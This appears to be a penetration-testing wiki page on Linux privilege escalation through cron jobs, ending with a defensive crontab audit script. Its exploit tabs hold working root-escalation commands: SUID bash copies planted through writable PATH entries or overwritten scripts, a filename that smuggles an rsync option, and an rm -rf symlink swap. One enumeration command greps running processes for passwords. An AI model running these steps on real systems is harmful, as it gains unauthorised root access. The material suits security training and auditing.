# Cron Jobs

## Theory

Cron is a job scheduler on Unix-based operating systems. Cron jobs are used to schedule tasks by executing commands at specific dates and times on the server.\
By default, Cron runs as root when executing */etc/crontab*, so any commands or scripts called from the crontab also run as root. This makes it an interesting privilege escalation path.

## Practice

### Misc Cron Jobs

{% tabs %}
{% tab title="Enumerate" %}
You may want to enumerate cron jobs with the following commands:

```bash
#Print jobs with Crontab binary
crontab -l
crontab -l -u username

#Directly cat files
cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/root 2>/dev/null | grep -v "^#"

#From logs
cat /var/log/syslog | grep "CRON"

#In /etc/ and subfolders
cat /etc/crontab
cat /etc/cron*/*

# In /var/spool
cat /var/spool/cron/*
cat /var/spool/cron/crontabs/*
```

{% endtab %}

{% tab title="Monitor" %}
By using [**pspy**](https://github.com/DominicBreuker/pspy), you can watch processes being spawned without root privileges. This is useful for detecting cron jobs, including ones you cannot read in the crontab files.

```bash
# -p: print commands to stdout
# -f: print file system events to stdout
# -i: interval in milliseconds
./pspy64 -pf -i 1000
```

It is also possible to monitor processes using the `watch` command. For example, we can grep the process list for every occurrence of the word "pass"; clear-text credentials passed on a command line sometimes show up this way.

```bash
watch -n 1 "ps -ef | grep pass"
```

{% endtab %}
{% endtabs %}

### Cron Path

{% tabs %}
{% tab title="Enumerate" %}
Inside */etc/crontab* you can find the PATH used by the jobs, for example: `PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin`

We need to check whether we have **write permissions** on any of these directories. If the binary in a cron job is specified without its full path, cron searches these directories in order, and we may be able to exploit it.

```bash
$ cat /etc/crontab

SHELL=/bin/sh
PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

17 *    * * *   root    path-exploit.sh
```

{% endtab %}

{% tab title="Exploit" %}
We need to check whether we have write permission on each directory of the PATH.

```bash
ls -al /usr/local/
ls -al /usr/
ls -al /
```

Assume we can write an arbitrary file under **`/home/user`**, and that this directory is listed in the crontab PATH as in the example. We can create a payload there.

```bash
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/path-exploit.sh
chmod +x /home/user/path-exploit.sh
```

Then wait for the job to execute.

```bash
# Run SUID Shell after exploit
/tmp/bash -p
```

{% endtab %}
{% endtabs %}

### Wildcard Injection

{% tabs %}
{% tab title="Enumerate" %}
If a cron job script running as root contains an unquoted `*` (a shell wildcard) in a command, then you may be able to exploit it.

```bash
$ cat /etc/crontab

SHELL=/bin/sh
PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

17 *    * * *   root    rsync -a *.sh rsync://host.back/src/rbd
```

{% endtab %}

{% tab title="Exploit" %}
The exploit depends on the binary. Using the previous example, we can use the following commands to exploit it.

```bash
touch "-e sh myscript.sh"

echo '<PAYLOAD>' > myscript.sh
```

Read the following page for more wildcard exploitation tricks: [HERE](https://book.hacktricks.xyz/linux-hardening/privilege-escalation/wildcards-spare-tricks)
{% endtab %}
{% endtabs %}

### File Overwriting and Symlink

{% tabs %}
{% tab title="Enumerate" %}
If you **can modify a cron job script** executed by root, or the script lives in a **directory where you have full access**, then we can exploit it.

```bash
$ cat /etc/crontab

SHELL=/bin/sh
PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

17 *    * * *   root    /opt/crons/overwrite.sh
```

{% endtab %}

{% tab title="Exploit" %}
If we have write permissions on the script, we can exploit by overwriting it:

```bash
#Check you have permissions
ls -la /opt/crons/overwrite.sh

#Overwrite
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /opt/crons/overwrite.sh

#Wait until it is executed
/tmp/bash -p
```

If we have **full access over the directory** containing the script, it may be possible to delete that folder and **replace it with a symlink to another folder** serving a script controlled by you.

```bash
#Check you have write permissions on the parent directory
ls -la /opt

#Remove the folder and create the symlink target
rm -rf /opt/crons
mkdir /tmp/crons

#Create a new script
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /tmp/crons/overwrite.sh

#Create the symlink folder in place of the original one
ln -s /tmp/crons /opt/crons
```

{% endtab %}
{% endtabs %}
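As an added example (not part of the original page), a small audit script that scans system-crontab text for the three weaknesses covered above: relative command names combined with writable PATH entries, unquoted wildcards in arguments, and scripts or script directories that are group/world writable. The crontab text is a constructed sample mirroring this page's examples; the `writable` and `exists` hooks are assumptions added so the checks can be exercised without touching the real filesystem.

```python
import os
import shlex
import stat
# Constructed sample mirroring the three crontab entries shown on this page.
SAMPLE_CRONTAB = """\
PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 *    * * *   root    path-exploit.sh
17 *    * * *   root    rsync -a *.sh rsync://host.back/src/rbd
17 *    * * *   root    /opt/crons/overwrite.sh
"""

def group_or_world_writable(path):
    """Mode-bit check only (ACLs are ignored); missing paths count as not writable."""
    try:
        return bool(os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))
    except OSError:
        return False

def audit_crontab(text, writable=group_or_world_writable, exists=os.path.exists):
    """Return (user, command, finding) tuples for system-crontab text (schedule, user, command)."""
    findings, path_dirs = [], []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("PATH="):
            path_dirs = line[len("PATH="):].split(":")
            continue
        if "=" in line.split()[0]:               # SHELL=, MAILTO= and other variables
            continue
        n = 3 if line.startswith("@") else 7     # "@daily user cmd" or five time fields + user + cmd
        parts = line.split(None, n - 1)
        if len(parts) != n:
            continue
        user, command = parts[-2], parts[-1]
        argv = shlex.split(command)
        prog = argv[0] if argv else ""
        if prog and "/" not in prog:
            # Relative name: any writable PATH entry searched before the real binary can shadow it.
            for d in path_dirs:
                if writable(d):
                    findings.append((user, command, f"writable PATH entry {d} can shadow {prog}"))
                if exists(os.path.join(d, prog)):
                    break
        elif writable(prog) or writable(os.path.dirname(prog)):
            findings.append((user, command, f"{prog} or its directory is group/world writable"))
        for tok in command.split()[1:]:          # raw tokens, so quoted globs are not flagged
            if tok[0] not in "'\"" and any(c in tok for c in "*?["):
                findings.append((user, command, f"unquoted wildcard argument {tok}"))
    return findings
```

Run `audit_crontab(open("/etc/crontab").read())` with the default hooks to check a real host; entries in `/etc/cron.d/*` use the same format.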

## References

{% embed url="https://book.hacktricks.xyz/linux-hardening/privilege-escalation" %}

{% embed url="https://tryhackme.com/room/linuxprivescarena" %}
